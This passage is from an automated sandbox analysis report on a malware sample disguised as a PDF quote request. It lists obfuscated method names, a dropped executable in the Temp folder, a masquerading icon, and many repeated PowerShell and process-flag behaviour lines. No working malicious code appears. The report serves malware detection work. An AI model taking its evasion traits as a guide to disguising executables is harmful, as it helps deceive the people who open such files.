            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, y9Ec3dNVelmRgxq7LE.csHigh entropy of concatenated method names: 'tFVg4dfrfv', 'r1bgJDc8Uy', 'fJjg6P7rGT', 'zWHgDtIeKG', 'Kopgp0eQeN', 'hhsg3c1n7v', 'AMFgotF8gv', 'FcqgOLv5EX', 'zPSgRCaqMS', 'Iqqg2Pw3BV'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, GVWMM5yX6okaexqC4I.csHigh entropy of concatenated method names: 'QeCshG6GS9', 'hZLs1DAZ7m', 'DJeZSl8El1', 'rkiZUXHpN1', 'LfXstyHbiJ', 'wZCskUPHmS', 'z58si7cG04', 'hbTs59OxFt', 'jygsBlF0ca', 'iCes0WS2jN'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7be0000.9.raw.unpack, K4VVbTCGN4q2c8lCCj.csHigh entropy of concatenated method names: 'G3KbyTLLkM4Bb', 'si9SO65af8rO14mjPDU', 'bBffTJ5RQH5OqC4Gea9', 'ovKlj65mCkfoxl0nYKf', 'BWF7CK5kxuHeQeFkeiK', 'qwHs9D5fCc7yK8DUC5g', 'CQU41K5NJrprlOnEHS0', 'RhSTw15QcpoAFlp1KXj', 'nntNvk5jVxrl8qAx10M', 'uNAC9m5VOKsj7MEAs02'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7be0000.9.raw.unpack, q1bUrWhd8NtMR4Tat2.csHigh entropy of concatenated method names: 'FtMrR4Tat', 'asVbu6B2r', 'BfjKHvjWV', 'r8MoiUGvh', 'dTGON4q2c', 'brXv00T5r', 'Dispose', 'q1bhUrWd8', 'zN8XoTN4OjYAicjyxg', 'ruXo51Q9ZfIq3o9q7i'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7be0000.9.raw.unpack, RLhDAEYwfjHvjWVq5a.csHigh entropy of concatenated method names: 'An354LdEp', 'zbMnKODFs', 'B6jqN3UrZ', 'QkT3JtuA7', 'rmgQyVns4', 'CtlpashST', 'Bh5RaqMVd', 'PW46FiDNh', 'W34ldUSmX', 'AVZwxu1MB'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2ec5d84.1.raw.unpack, K4VVbTCGN4q2c8lCCj.csHigh entropy of concatenated method names: 'G3KbyTLLkM4Bb', 'si9SO65af8rO14mjPDU', 'bBffTJ5RQH5OqC4Gea9', 'ovKlj65mCkfoxl0nYKf', 'BWF7CK5kxuHeQeFkeiK', 'qwHs9D5fCc7yK8DUC5g', 'CQU41K5NJrprlOnEHS0', 'RhSTw15QcpoAFlp1KXj', 'nntNvk5jVxrl8qAx10M', 'uNAC9m5VOKsj7MEAs02'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2ec5d84.1.raw.unpack, q1bUrWhd8NtMR4Tat2.csHigh entropy of concatenated method names: 'FtMrR4Tat', 'asVbu6B2r', 'BfjKHvjWV', 'r8MoiUGvh', 'dTGON4q2c', 'brXv00T5r', 'Dispose', 'q1bhUrWd8', 'zN8XoTN4OjYAicjyxg', 'ruXo51Q9ZfIq3o9q7i'
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2ec5d84.1.raw.unpack, RLhDAEYwfjHvjWVq5a.csHigh entropy of concatenated method names: 'An354LdEp', 'zbMnKODFs', 'B6jqN3UrZ', 'QkT3JtuA7', 'rmgQyVns4', 'CtlpashST', 'Bh5RaqMVd', 'PW46FiDNh', 'W34ldUSmX', 'AVZwxu1MB'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, uZFmmbBhNvbryEJbSq.csHigh entropy of concatenated method names: 'YyW6cI8HNx', 'X2u6EJQNut', 'SwZ6NdJWfL', 'AW662uYY3Y', 'jnu6JBiCAB', 'FXK69Cv18t', 'EZU6MtpH4Y', 'wnk635t74s', 'Q0O6LV5NIa', 'Tcf6Ddx2Il'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, UmGI57hwbJqkH0RjZh.csHigh entropy of concatenated method names: 'OXgG1xwdY4', 'TGaGfg1ovn', 'zGMG8EgxNG', 'XCJGARqFrq', 'eVEGY8Hrjp', 'Cc2GtjJTm9', 'b5xGFUYY4y', 'hJXRqmgwBF', 'P4RRxGHS1J', 'eiPRlVUpZc'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, vtbp6H4XMgROcN0Se2T.csHigh entropy of concatenated method names: 'Hi4GwIFyee', 'djSGSYWAU6', 'nvEGsYrTxi', 'FPgGi6sQkh', 'lOSGCRfBon', 'kOtGOPCfIP', 'MjjGr3CrYm', 'iMJGWM5GOa', 'QuYG7A9tLj', 'IhvGP5f6J5'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, ikrS6OrutL3CBZSZ4R.csHigh entropy of concatenated method names: 'ToString', 'epIg4en7ty', 'SaqgJZZoM1', 'l4ag9tBqRA', 'phEgMErXRP', 'vcTg3iAc7y', 'G8NgLvEqoK', 'o08gDGPTCS', 'HuUgIpW5TQ', 'tGpgvLnY3b'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, IPOy3Y1udLGY2UOY89.csHigh entropy of concatenated method names: 'AUPFmD3RKO', 'gOxFYgLbn6', 'XOUFtiAnq3', 'GhUFaOpoTe', 'V2cFTOOsFP', 'vNetBpwelp', 'iPbtVhb3vc', 'oOqtqpNxUh', 'HUxtxFqUYJ', 'kcbtlPbZpP'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, l6PBra3RZ7f3E4VSeC.csHigh entropy of concatenated method names: 'woWniSg32o', 'R20nOuuSpC', 'AyAnWagRAN', 'RPbn7AUGD3', 'bZ5n6HJirp', 'Y2mngxd0i9', 'RdUn5h7KXc', 'bt2nRUfGk2', 'HyAnGN7eep', 'm69nXolHYt'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, h2df4pn6d2N4C8egS2.csHigh entropy of concatenated method names: 'q52YNSFSxK', 'ioSY2nqLCb', 'y5TYh3lKrj', 'qtoYpeMuaY', 'S80YBeF6wW', 'uKxYVSDCZc', 'Ec5YqYJkoJ', 'LsKYx3WxZL', 'lGjYloyl8p', 'CqIYjfo3I9'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, BVvQkKGnivA0dbGJTm.csHigh entropy of concatenated method names: 'K0afmGuYnX', 'iYtfAiOiFg', 'Tk3fYlAdjZ', 'EkkfnMXT6d', 'OLVftmZMS3', 'PJCfF8DuaQ', 'frpfa9pfr8', 'fbofT5fJBA', 'rGufKbsGG2', 'g9jfZL1MLy'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, n9HqQr4eZW6QZX9oQuD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'x1KXNTg11j', 'MMyX20IBhr', 'JCKXhrxbZf', 'mcoXpid2fH', 'BU3XBEHUK9', 'JFwXVwyCr3', 'bpoXqyO3TE'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, mjp9oQM5T6DfksQfjX.csHigh entropy of concatenated method names: 'UvGRbkQSyV', 'RySRJ6BQZj', 'pfyR9OJb9d', 'aCeRMcZx71', 'N5WRN4HmjD', 'cdDR3W745K', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, JY1vamScMM9FQrFBji.csHigh entropy of concatenated method names: 'Rav5ZrnKoZ', 'L3d5y1Gb3R', 'ToString', 'k9c5AXLyGw', 'OP75YIrluQ', 'z0w5n2LFc6', 'LHd5tqhm7e', 'S8h5FL00sK', 'tQ05aojgOs', 'jC65TlyeNT'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, qci77OCC0SLuseQv06.csHigh entropy of concatenated method names: 'DuPRAJeYpS', 'z4PRYc8Up4', 'cyqRn7XpNb', 'wlBRt8bMB5', 'ExoRFsT0ni', 'pXBRa13rPL', 'XbPRTyNOqB', 'JCiRKNuOFv', 'HaqRZ0q8kg', 'zrWRynMQi5'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, F9R13D5t4ym96j8XnF.csHigh entropy of concatenated method names: 'ldJdWGoac3', 'KmDd7XsuQo', 'nkSdb0ELLh', 'WpUdJqJfFo', 'yG7dMd6CIJ', 'yYcd3CtUKu', 'k5RdDglGXg', 'lQvdIFTB7I', 'rl1dckWJnL', 'XbKd4hZ6DC'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, SNNgg3QtqAC90WQDqG.csHigh entropy of concatenated method names: 'hk7tCAEhbg', 'tSotr0KisW', 'Cbqn9CKhLq', 'OUbnMIsu0a', 'Ruhn3Oygis', 'lkXnLPvDAT', 'QHxnD5avFl', 'AZanISqjlD', 'W2UnvB7A3Y', 'uQmncPXNlZ'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, cddkCfWykMInk9AHwu.csHigh entropy of concatenated method names: 'Dispose', 'zPr1lg2mGH', 'vmrHJqlB5N', 'd3booRHrZl', 'BFF1jw28YI', 'zMr1z2JvSm', 'ProcessDialogKey', 'xakH0whoAW', 'VrtH1jyxfu', 'lYWHHeWNvU'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, xeeKOrTxmKsKK2MI89.csHigh entropy of concatenated method names: 'yyE5xLuYLW', 'Vgx5jGAWoL', 'CBtR0rbdPx', 'yhbR1M16H9', 'PpQ54qSPyE', 'LS45EIn84u', 'xel5QZNd8d', 's5Y5NeFpE6', 'GYM52TXWWp', 'vgH5hIQm9i'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, D5EXegz0NJ6bN5yNEA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gn2GdTAmAD', 'y0IG6u5blu', 'FjPGgUMp7j', 'cTpG54kmrh', 'MOUGRuX3KE', 'viLGGx2ofm', 'JlOGXn5lO6'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, yblEaqHBrW68NLZC9b.csHigh entropy of concatenated method names: 'l68awRkCPk', 'RqUaSyk2h1', 'HocasPo7bd', 'YiVaiag3Dc', 'DLjaCbGSsf', 'Yx6aO6ejiW', 'cgJarxLnNI', 'ph0aWysFQ7', 'kRia7wiJH8', 'rrCaP9JnJP'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, lS8uNLZybT9wX8f2Yw.csHigh entropy of concatenated method names: 'l1B1acZQoF', 'AhE1TnkY2K', 'S5O1ZDCIbX', 'k631yiMBUI', 'wHo16EmIbq', 'JaF1gAaNdv', 'qjsYKR9qLK7NTcPBMA', 'euMhIsuZcbKyuJAYWe', 'b6v11P2yLc', 'q3u1fNBeH9'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, KWg9TJLvr7HVKQhRsW.csHigh entropy of concatenated method names: 'f7Rs5746o', 'p75i8Oia5', 'k9EOfsMBj', 'npLriyt3M', 'rmG7Ssrt6', 'xPJPRybyJ', 'Lfj0f8i9FKFQv354Ow', 'Mv7sdVlvbcdvahpumr', 'x9HROrrZn', 'YoDXEp5Ws'
            Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, dOVG8cvcqoP12cvV28.csHigh entropy of concatenated method names: 'kufaAKqXvf', 'hFyan2JLWq', 'pumaFVOCbV', 'xMnFj7gU7n', 'vKJFzTHeXn', 'phDa0GHthd', 'v6Va1F1bpo', 'bitaHHPAQE', 'oukafLcDFa', 'rWoa8hpubI'
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeFile created: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (29).png
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
